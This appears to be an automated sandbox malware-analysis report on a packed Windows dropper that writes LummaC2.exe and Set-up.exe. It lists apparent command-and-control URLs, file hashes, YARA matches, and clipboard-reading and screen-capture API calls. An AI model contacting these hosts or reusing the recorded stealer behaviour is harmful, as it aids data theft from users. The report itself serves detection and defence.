Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000003.00000003.1765822531.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766033118.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766204519.0000000001750000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1767266161.0000000001369000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000003.00000003.1766547847.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1767771085.0000000001752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000003.00000002.1767809827.0000000001770000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1765761115.000000000176A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000002.1767266161.0000000001369000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Set-up.exe, 00000003.00000003.1765822531.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766033118.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766204519.0000000001750000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766547847.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1767771085.0000000001752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exe, 00000003.00000003.1569654726.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00A91B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00A91B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00A91B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00A91B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00A91D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00A91D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.OAKPYEH4c6.exe.ee0000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: OAKPYEH4c6.exe	Static PE information: section name:
Source: OAKPYEH4c6.exe	Static PE information: section name: .idata
Source: OAKPYEH4c6.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A95135	2_2_00A95135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A68720	2_2_00A68720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A968A0	2_2_00A968A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A78095	2_2_00A78095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8C894	2_2_00A8C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A830E0	2_2_00A830E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A870F9	2_2_00A870F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A980C5	2_2_00A980C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9A0D0	2_2_00A9A0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A79820	2_2_00A79820
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9483C	2_2_00A9483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7683F	2_2_00A7683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7A800	2_2_00A7A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9A800	2_2_00A9A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9B813	2_2_00A9B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7D840	2_2_00A7D840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A859B0	2_2_00A859B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8C984	2_2_00A8C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8C9E9	2_2_00A8C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9E1F0	2_2_00A9E1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8C9DA	2_2_00A8C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A661D0	2_2_00A661D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A63960	2_2_00A63960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A65970	2_2_00A65970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6C97C	2_2_00A6C97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6B14F	2_2_00A6B14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D140	2_2_00A9D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6F2A0	2_2_00A6F2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8C289	2_2_00A8C289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A71A94	2_2_00A71A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A69290	2_2_00A69290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7AAE0	2_2_00A7AAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A74AEA	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A68A20	2_2_00A68A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7E230	2_2_00A7E230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A86230	2_2_00A86230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7C205	2_2_00A7C205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7720B	2_2_00A7720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A87A40	2_2_00A87A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D240	2_2_00A9D240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9CBA6	2_2_00A9CBA6
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8A3B0	2_2_00A8A3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D3B0	2_2_00A9D3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9DBB0	2_2_00A9DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A96BF0	2_2_00A96BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6AB20	2_2_00A6AB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D320	2_2_00A9D320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A64310	2_2_00A64310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A91B10	2_2_00A91B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A77B75	2_2_00A77B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6D35C	2_2_00A6D35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A764E0	2_2_00A764E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A974F0	2_2_00A974F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A6E465	2_2_00A6E465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A83C60	2_2_00A83C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A67440	2_2_00A67440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A88C46	2_2_00A88C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A64C50	2_2_00A64C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7DC50	2_2_00A7DC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D450	2_2_00A9D450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A87D94	2_2_00A87D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A81D10	2_2_00A81D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9A510	2_2_00A9A510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7D560	2_2_00A7D560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9E540	2_2_00A9E540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A81550	2_2_00A81550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A97EA0	2_2_00A97EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9DEB0	2_2_00A9DEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A866C0	2_2_00A866C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8FEC0	2_2_00A8FEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A826D3	2_2_00A826D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A65E30	2_2_00A65E30
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A79605	2_2_00A79605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A66660	2_2_00A66660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A75640	2_2_00A75640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A85640	2_2_00A85640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A97790	2_2_00A97790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A95FF0	2_2_00A95FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A83FF1	2_2_00A83FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7DFC0	2_2_00A7DFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8DFC3	2_2_00A8DFC3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A7F700	2_2_00A7F700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A69710	2_2_00A69710
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A70F71	2_2_00A70F71
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A62F40	2_2_00A62F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A8BF45	2_2_00A8BF45

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\LummaC2.exe C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Set-up.exe 73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00A67FF0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 00A74A40 appears 63 times

Source: OAKPYEH4c6.exe, 00000000.00000002.1568230050.00000000015B6000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs OAKPYEH4c6.exe
Source: OAKPYEH4c6.exe, 00000000.00000002.1571572769.00000000058D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs OAKPYEH4c6.exe
Source: OAKPYEH4c6.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs OAKPYEH4c6.exe

Source: OAKPYEH4c6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.OAKPYEH4c6.exe.ee0000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: OAKPYEH4c6.exe

Static PE information: Section: pjfeqmbk ZLIB complexity 0.9948227408323632

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00A8D110 CoCreateInstance,

2_2_00A8D110

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OAKPYEH4c6.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: OAKPYEH4c6.exe

ReversingLabs: Detection: 55%

Source: OAKPYEH4c6.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: OAKPYEH4c6.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\OAKPYEH4c6.exe "C:\Users\user\Desktop\OAKPYEH4c6.exe"
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: OAKPYEH4c6.exe

Static file information: File size 6224896 > 1048576

Source: OAKPYEH4c6.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: OAKPYEH4c6.exe	Static PE information: Raw size of pjfeqmbk is bigger than: 0x100000 < 0x1ad800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Unpacked PE file: 0.2.OAKPYEH4c6.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pjfeqmbk:EW;bqwrlfcf:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: OAKPYEH4c6.exe	Static PE information: real checksum: 0x5f2518 should be: 0x5fcb8c
Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3

Source: OAKPYEH4c6.exe	Static PE information: section name:
Source: OAKPYEH4c6.exe	Static PE information: section name: .idata
Source: OAKPYEH4c6.exe	Static PE information: section name:
Source: OAKPYEH4c6.exe	Static PE information: section name: pjfeqmbk
Source: OAKPYEH4c6.exe	Static PE information: section name: bqwrlfcf
Source: OAKPYEH4c6.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9D0F0 push eax; mov dword ptr [esp], 03020130h	2_2_00A9D0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_00A9A480 push eax; mov dword ptr [esp], C9D6D7D4h	2_2_00A9A48E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD
